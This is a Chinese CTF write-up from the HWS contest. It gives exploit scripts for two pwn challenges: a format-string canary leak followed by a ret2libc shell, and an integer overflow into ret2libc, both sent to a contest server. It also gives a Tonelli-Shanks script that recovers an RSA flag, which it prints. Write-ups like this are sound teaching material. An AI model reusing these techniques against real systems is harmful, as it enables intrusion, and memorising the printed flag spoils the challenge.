2023.11.18

两天半的比赛,就打了半天(因为要赶去打香山杯决赛了),不过结果还算好,人生第一次拿了两个一血hhh。写wp的时候人在中大南校北门的酒店里:)

controller

格式化字符串泄露canary之后打ret2libc即可。

from evilblade import *

context(os='linux', arch='amd64')

context(os='linux', arch='amd64', log_level='debug')

setup('./pwn')

libset('./libc-2.27.so')

evgdb()

rsetup('124.71.135.126',30024)

rdi = 0x0000000000402533 # pop rdi ; ret

putsg = gotadd('puts')

puts = pltadd('puts')

sl(b'6')

sl(b'2')

sl(b'2')

sla('fo',b'%13$p')

sl(b'')

sl(b'1')

sl(b'')

ru(b'No.2')

addx = getx(-13,-1)

base = addx - 0x21c87

dpx('libcbase',base)

sl(b'6')

sl(b'2')

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

can = getx(-19,-1)

dpx('can',can)

#需要泄露canary

sl(b'0')

sl(b'0')

sl(b'')

sl(b'9')

sla('ame:',b's'*1)

sh = base+0x00000000001b3d88

sys = pltadd('system')

ret = 0x0000000000400b3e

#sla(b'password:',b'\x00\x02aaaaaa'+p64(can)+p64(0x400d20))

sla(b'password:',b'\x00\x02aaaaaa'+p64(can)+b'aaaaaaaa'+p64(rdi)+p64(sh)+p64(ret)*3+p64(sys))

ia()

inverse

ret2libc和整数溢出

from evilblade import *

context(os='linux', arch='amd64')

context(os='linux', arch='amd64', log_level='debug')

setup('./pwn')

libset('./libc-2.27.so')

evgdb()

rsetup('124.71.135.126',30007)

tag = 0x804C030

puts = pltadd('puts')

putsg = gotadd('puts')

sa(':',b'/bin/sh')

sl(b'-1')

sla(':',b'a'*(0x3c+4)+p32(puts)+p32(0x80493d5)+p32(putsg))

add = getx64(0,-17)

base = getbase(add,'puts')

pause()

sl(b'-1')

sys = symoff('system',base)

sh = base + 0x0017b9db

sl(b'a'*(0x3c+4)+p32(sys)+p32(0xdeadbeef)+p32(sh)+p32(0xdeadbeaf))

ia()

ezrsa

求模平方根即可。

n = 4124820799737107236308837008524397355107786950414769996181324333556950154206980059406402767327725312238673053581148641438494212320157665395208337575556385

m = 13107939563507459774616204141253747489232063336204173944123263284507604328885680072478669016969428366667381358004059204207134817952620014738665450753147857

def legendre_symbol(a, p):

    # 计算雅可比符号 (a/p)

    if a % p == 0:

        return 0

    elif pow(a, (p - 1) // 2, p) == 1:

        return 1

    else:

        return -1

def mod_sqrt(n, p):

    # Tonelli-Shanks 算法求模平方根

    if legendre_symbol(n, p) != 1:

        raise Exception('No modular square root exists')

    q = p - 1

    s = 0

    while q % 2 == 0:

        q //= 2

        s += 1

    if s == 1:

        return pow(n, (p + 1) // 4, p)

    z = 2

    while legendre_symbol(z, p) != -1:

        z += 1

    c = pow(z, q, p)

    r = pow(n, (q + 1) // 2, p)

    t = pow(n, q, p)

    m = s

    while t != 1:

        i = 1

        while pow(t, 2**i, p) != 1:

            i += 1

        b = pow(c, 2**(m - i - 1), p)

        r = (r * b) % p

        t = (t * b * b) % p

        c = (b * b) % p

        m = i

    return r

def solve_quadratic_congruence(n, m):

    # 解二次同余方程 x^2 ≡ n (mod m)

    if m == 2:

        return [n % 2, (n % 2) ^ 1]  # 对于模2,只有0和1两个解

    solutions = []

    # 判断模平方根是否存在

    if pow(n, (m - 1) // 2, m) != 1:

        raise Exception('No solution exists')

    # 计算模平方根

    sqrt_n = mod_sqrt(n, m)

    # 解方程

    x1 = sqrt_n

    x2 = m - sqrt_n

    solutions.append(x1)

    solutions.append(x2)

    return solutions

# 示例用法

result = solve_quadratic_congruence(n, m)

print(f"Solutions for x^2 ≡ {n} (mod {m}): {result}")

'''

>>> from Crypto.Util.number import *

>>> long_to_bytes(13107939563507459774616204141253747489232063336204173944123263271467599846065153978657975398261302535968199127597145828004727119047657179535038810099310932)

b'\xfaFF"\x0bxn\x93\xd1\xfd8\x91\x8d;g\x8c\xf7Wj\xcf\x8c\xde\x94\x14\xea\xd9\xfdB\xd5\x16\xe4>\xe5\xdf%(\xb29^\x87v\x04\x9eOV\xc9\xd18\xc6o\x08\xb8vL\x16N\xb6\xede\xf9\x13\x90aT'

>>> long_to_bytes(13040004482820526093820693618708125830699182230406913376202407698904962835203626640653836925)

b'flag{9971e255f0c020e8e57fbae75f43d7fb}'

'''

HWS山大专区PWN双一血 & CRYPTO-WP的更多相关文章

  1. [复现]2021 DASCTF X BUUOJ 五月大联动-PWN

    [复现]2021 DASCTF X BUUOJ 五月大联动 由于我没ubuntu16就不复现第一个题了,直接第二个 正常的off by one from pwn import * context.os ...

  2. 腾讯云开放云压测“黑科技“,产品上线从此不再“压力山大"

    商业转载请联系腾讯WeTest获得授权,非商业转载请注明出处. 能否解决"高并发"问题一直是检验一个产品后台是否稳定,架构是否合理,性能是否强大的核心标准.对于产品而言,多高的并发 ...

  3. bugku crypto wp上半部分汇总

    1.滴答~滴 摩斯码,在线解开. 2. 栅栏密码,在线解就出flag了. 3. Ook解密,由.?!Ook组成密文,在线网站解密 4.这不是摩斯密码 有点像jsfuck,发现又不是,因为不会出现大于号 ...

  4. 双11遇上ZBrushCore,如此优惠还等什么!

    对不起!让大家久等了,ZBrush简体中文版ZBrushCore这次是真的来了,恰逢双11,老板说了,钱不是问题,你们开心就好,特别是热爱3D的单身狗们!你们那么热爱这个行业,1099元/套终身授权使 ...

  5. 微信事业群WXG成立 致力于打造微信大平台

    今天,微信之父张小龙带领微信团队成立微信事业群(WeiXin Group,简称WXG),致力于打造微信大平台,由他们负责微信基础平台.微信开放平台.微信支付拓展.O2O等微信延伸业务的发展,并包括邮箱 ...

  6. "浪潮杯"第六届ACM山东省省赛山科场总结

    从空间拷过来的.尽管已经过去一个月了.记忆犹新 也算是又一次拾起这个blog Just begin 看着一群群大牛还有队友男神的省赛总结都出了 我最终也耐不住寂寞 来做个流水账抒抒情好了 第一次省赛 ...

  7. 分布式系统中我们会对一些数据量大的业务进行分拆,分布式系统中唯一主键ID的生成问题

    分布式全局唯一ID生成策略​ https://www.cnblogs.com/vandusty/p/11462585.html 一.背景 分布式系统中我们会对一些数据量大的业务进行分拆,如:用户表,订 ...

  8. 2021羊城杯比赛复现(Crypto)

    bigrsa 题目: from Crypto.Util.number import * from flag import * n1 = 10383529640908175186077053551474 ...

  9. 5G为何采纳华为力挺的Polar码?一个通信工程师的大实话

    Polar码被采纳为5G eMBB场景的控制信道编码,这两天连续被这条消息刷屏,连吃瓜群众都直呼好爽. 然而,随着媒体报道的持续发酵,真相在口口相传中变了形,不乏夸大不实之嫌,小编终于坐不住了,也想吐 ...

  10. [转][业界动态] 5G为何采纳华为力挺的Polar码?一个通信工程师的大实话

    本文转自:http://xinsheng.huawei.com/cn/index.php?app=forum&mod=Detail&act=index&id=3264791 P ...

随机推荐

  1. php开发之文件下载的实现

    前言 php是网络安全学习里必不可少的一环,简单理解php的开发环节能更好的帮助我们去学习php以及其他语言的web漏洞原理 正文 在正常的开发中,文件下载的功能是必不可少,比如我们在论坛看到好看图片 ...

  2. 使用 nacos 搭建注册中心及配置中心

    本文为博主原创,转载请注明出处: 在分布式微服务框架中,现在都流行使用 nacos 作为分布式框架的注册中心与配置中心.当我们搭建一套spring boot 框架的时候,默认会将配置文件 放在 res ...

  3. STM32CubeMX教程21 CAN - 双机通信

    1.准备材料 开发板(正点原子stm32f407探索者开发板V2.4) STM32CubeMX软件(Version 6.10.0) 野火DAP仿真器 keil µVision5 IDE(MDK-Arm ...

  4. C# WPF侧边栏导航菜单(Dropdown Menu)

    时间如流水,只能流去不流回! 点赞再看,养成习惯,这是您给我创作的动力! 本文 Dotnet9 https://dotnet9.com 已收录,站长乐于分享dotnet相关技术,比如Winform.W ...

  5. phpcms - 获取单网页 , 例如关于我们

       {pc:get sql="select * from phpcms_page where catid=2" num="1"}         {loop  ...

  6. Shell-全局变量-export

  7. 一次异常OOM问题学习跟踪的过程

    摘要 春节后第一周一个项目出现了OOM的问题. 平台研发和产品研发跟踪了接近一周的时间也没有最终确认问题根因. 这里总结一下整个过程, 希望以后在遇到相同问题时会有进一步的结论. 产品的稳定运行离不开 ...

  8. [转帖]聊聊hikari连接池的leakDetectionThreshold

    http://www.manongjc.com/detail/52-hjoufmsfhtsqvgp.html 本文章向大家介绍聊聊hikari连接池的leakDetectionThreshold,主要 ...

  9. Windows平台的prometheus和Grafana的学习与使用

    Windows平台的prometheus和Grafana的学习与使用 背景 最近没有了linux机器 突然想捯饬一下Windows平台的监控与使用 所以总结一一下. 第一步下载 https://pro ...

  10. [转帖]PostgreSQL(三) 内存参数优化和原理(work_mem)内存表 pgfincore插件使用方法

    1.常用内存参数 1.1 shared_buffers shared_buffers是PostgreSQL用于共享缓冲区的内存,是由8kb大小的块所形成的数组.PostgreSQL在进行更新.查询等操 ...